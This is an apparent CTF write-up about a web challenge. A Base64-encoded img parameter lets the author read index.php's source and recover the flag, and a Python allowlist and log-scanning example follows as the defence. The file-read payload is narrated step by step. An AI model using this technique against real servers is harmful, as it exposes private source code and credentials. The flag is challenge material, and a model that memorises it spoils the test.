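The page opens on a smirking emoji face. Note the value after ?img= in the URL:
ZmFjZS5wbmc=
It looks a lot like Base64, so let's decode it.
It turns out to be an image file name.
So what about ?img=1?
Nice, it throws an error, and the error reveals index.php.
Following the "read whatever you find" theorem from the CTF-web theorems (which I made up),
let's put it after ?img= and see.
Why is it still an error?
Oh right, index.php has to be Base64-encoded first, which gives aW5kZXgucGhw
No more error.
Take a look at the page source.
Sure enough, a long string of Base64.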
Let's see what it is.
It decodes to the source code, and the flag is in there too.
ctfshow{230524de-dd9e-431e-a507-fa1c99637493}
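
The root cause above is that the server Base64-decodes ?img= and reads whatever file name comes out. The following is an added example, not code from the challenge: a server-side allowlist check plus a log scan that flags off-allowlist img values. The allowlist contents and the sample log lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the application should only ever serve these image files.
ALLOWED_IMAGES = {"face.png"}


def decode_img_param(value):
    """Return the file name carried in ?img=, or None if it is not valid Base64 text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def is_allowed(value):
    """Server-side check: the decoded name must match an allowlist entry exactly."""
    return decode_img_param(value) in ALLOWED_IMAGES


def suspicious_requests(log_lines):
    """Return (url, decoded_name) for requests whose img value is off the allowlist."""
    hits = []
    for line in log_lines:
        match = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
        if not match:
            continue
        url = match.group(1)
        for value in parse_qs(urlsplit(url).query).get("img", []):
            if not is_allowed(value):
                hits.append((url, decode_img_param(value)))
    return hits


# Constructed sample access-log lines (not taken from the challenge server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?img=ZmFjZS5wbmc= HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?img=1 HTTP/1.1" 200 312',
    '203.0.113.5 - - [01/Jan/2024:10:00:21 +0000] "GET /index.php?img=aW5kZXgucGhw HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for url, name in suspicious_requests(SAMPLE_LOG):
        print(f"off-allowlist img request: {url} -> {name!r}")
```

Matching the decoded name against an exact allowlist, rather than filtering out bad substrings, is what stops the parameter from reaching the application's own source files.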